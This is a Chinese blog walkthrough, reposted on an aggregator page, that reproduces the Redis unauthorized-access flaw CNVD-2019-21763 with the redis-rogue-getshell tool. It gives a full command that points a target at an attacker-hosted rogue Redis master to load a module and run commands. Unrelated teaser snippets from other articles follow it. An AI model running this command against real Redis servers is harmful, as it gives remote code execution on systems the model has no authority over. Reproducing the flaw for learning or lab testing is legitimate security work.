Redis未授权访问-CNVD-2019-21763复现

news2024/11/28 12:53:56

Redis未授权访问-CNVD-2019-21763复现

利用项目： https://github.com/vulhub/redis-rogue-getshell

解压后先进入到 RedisModulesSDK目录里面的exp目录下，make编译一下才会产生exp.so文件，后面再利用这个exp.so文件进行远程代码执行

需要python3环境

# 利用命令，命令中的攻击IP要用公网IP
python3 redis-master.py -r 目标IP -p 目标端口 -L 攻击IP -P 8888 -f RedisModulesSDK/exp/exp.so -c "id"

进入到exp目录下make一下

来到 redis-master.py文件所属目录下执行命令，查看id

命令执行成功

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1256830.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

微机原理_5

一、单项选择题(本大题共15小题,每小题3分,共45分。在每小题给出的四个备选项中,选出一个正确的答案,请将选定的答案填涂在答题纸的相应位置上。) 8086微处理器CLK引脚输入时钟信号是由(提供。 A. 8284 B. 8288 C.8287 D. 8289 2.下面4个寄存器中,不能作为间接寻址的寄存器是(…

hivesql 将json格式字符串转为数组

hivesql 将json格式字符串转为数组完整过程SQL在文末 json 格式字符串本案例 json 字符串参考格式，请勿使用本数据 {"data": [{"province": 11,"id_card": "110182198903224674","name": "闾丘饱乾"…

【开源】基于JAVA的高校学院网站

项目编号： S 020 ，文末获取源码。 \color{red}{项目编号：S020，文末获取源码。} 项目编号：S020，文末获取源码。目录一、摘要1.1 项目介绍1.2 项目录屏二、功能模块2.1 学院院系模块2.2 竞赛报名模块2.3 教…

人工智能_机器学习051_支持向量机SVM概念介绍_理解support vector machine---人工智能工作笔记0091

在出现深度学习,神经网络算法之前,支持向量机已经可以解决很多问题了,我们自然界中的问题,无非就是可以转换为回归问题和分类问题. 然后从现在开始我们来看支持向量机,首先看一下这几个字 support 是支持 vector是向量的意思,然后 machine指的是机器那么我们之前用到的模型…

85基于Matlab的交通设施识别

基于Matlab的交通设施识别。 GUI设计图像处理, 基于数字图像处理，设计实现一个自然场景下公路交通限速标志分割和识别的程序。要求系统具有界面，并实现以下功能： 1）读入自然场景下包含交通标志的图像； 2）对…

Qt TCP网络上位机的设计（通过网络编程与下位机结合）

目录 TCP 协议基础 QTcpServer 和 QAbstractSocket 主要接口函数 TCP 应用程序 1.服务端 2.客户端上位机通过网络编程与下位机实现通信 TCP 协议基础传输控制协议（TCP，Transmission Control Protocol）是一种面向连接的、可靠的、基于…

蓝桥杯-动态规划-子数组问题

目录一、乘积最大数组二、乘积为正数的最长子数组长度三、等差数列划分四、最长湍流子数组心得： 最重要的还是状态表示，我们需要根据题的意思，来分析出不同的题，不同的情况，来分析需要多少个状态一、乘积最…

Node.js与npm的准备与操作

1.下载 Node.js官网：Node.jsNode.js is a JavaScript runtime built on Chromes V8 JavaScript engine.https://nodejs.org/en 打开后的界面如下： LTS（Long Term Support）：长期支持版，稳定版 Current&am…

Vue+ElementUI+C#技巧分享：周数选择器

文章目录前言一、周数的计算逻辑1.1 周数的定义1.2 年初周数的确定1.3 周数的计算方法二、VueElementUI代码实现2.1 计算周数2.2 获取周的日期范围2.3 根据周数获取日期范围2.4 控件引用2.4.1 控件引用代码分析2.4.2 初始化变量代码分析 2.5 周数选择器完整代码三、C#后端代…

10_7iic整体框架流程

在内核中这边把iic整个流程分成了 4层 iic_dtiver at24_iic_eeprom 也就是我们的自己的驱动 i2c-core.c 核心层 i2c/busses/i2c-s3c2410.c 控制器层平台总线驱动层,或者也是图中的设备树硬件描述我们假设板子上有三个iic控制器 0 1 2 这里在控制器0 上挂载了gt24c02的eep…

Retrofit怎么返回一个JSON字符串？

项目用已经使用了 Retrofit，定义了接口方法，返回了 JSON 转换后的实体对象，炒鸡方便。但是总有意料之外的时候，比如我不需要返回实体对象，我要返回纯纯的 JSON 字符串，怎么办呢？ 先看源码通过…

ros2智能小车中STM32地盘需要用到PWM的模块

我做的地盘比较简单，使用了一下模块： 4个直流减速电机，（每个模块用到了一个PWM） 光电对射测速模块（不用PWM) 超声波测距模块（不用PWM，只需要测量时间） sg90转向模块&…

C语言进阶-文件操作

目录文件分类程序文件数据文件文件的打开和关闭文件指针文件的顺序读写文件读取结束的判定文件缓冲区文件版通讯录实现代码注意事项编辑编辑实现效果文件分类磁盘上的文件是文件。但是在程序设计中，我们一般谈的文件有两种：程…

【虚拟机】在VM中安装 CentOS 7

1.2.创建虚拟机 Centos7是比较常用的一个Linux发行版本，在国内的使用比例还是比较高的。大家首先要下载一个Centos7的iso文件，我在资料中给大家准备了一个mini的版本，体积不到1G，推荐大家使用： 我们在VMware《主页》…

深入理解对象与垃圾回收机制

1、虚拟机中对象创建过程 1.1 对象创建过程当我们使用 new 创建一个对象时，在 JVM 中进行了如下操作： 类加载：把 class 加载到 JVM 运行时数据区的过程。可以通过本地文件的形式，也可以通过网络加载。检查加载：首…

【RTP】3： RTPSenderVideo::SendVideo 切片到发送

m98 版本。之前1 2 都是m79.RTPSenderVideo::SendVideo 负责切片，是入口实际发送要靠： RTPSender* const rtp_sender_; 外部传递的： rtp_rtcp\source\rtp_sender.h 实现了rtp rtcp协议，负责实际的打包新增了一个 TransformableFrameInterface 用的编码线程 - RTPSend…

【数据库】缓冲区管理器结构，几种常用替换策略分析，pin钉住缓冲区块防止错误的替换，以及缓冲区管理带来的代价优化

缓冲区管理专栏内容： 手写数据库toadb 本专栏主要介绍如何从零开发，开发的步骤，以及开发过程中的涉及的原理，遇到的问题等，让大家能跟上并且可以一起开发，让每个需要的人成为参与者。本专栏会定期更新&…

【Qt】判断QList链表内是否有重复数据

QList<int> listInt;listInt.push_back(1);listInt.push_back(1);listInt.push_back(2);listInt.push_back(3);qDebug().noquote() << listInt.toSet().toList();

（数据结构）顺序表的定义

#include<stdio.h> //顺序表的实现——静态分配 #define MAX 10 //定义最大长度 typedef struct List {int data[MAX]; //用静态的数组存放数据int lenth; //顺序表现在的长度 }List; //顺序表的初始化 void ChuShiHua(List L) {L.lenth 0; //将顺序表的长度初始化…

MFC居中显示文字及其应用

首先获取窗口客户区矩形，然后使用DrawText输出，设置DT_CENTER 和 DT_VCENTER标志；输出如上图；没有实现垂直居中；最终的代码如下； void CcenterView::OnDraw(CDC* pDC) {CcenterDoc* pDoc = GetDocument();ASSERT_VALID(pDoc);if (!pDoc)return;// TODO: 在此处为…

Redis未授权访问-CNVD-2019-21763复现

Redis未授权访问-CNVD-2019-21763复现

相关文章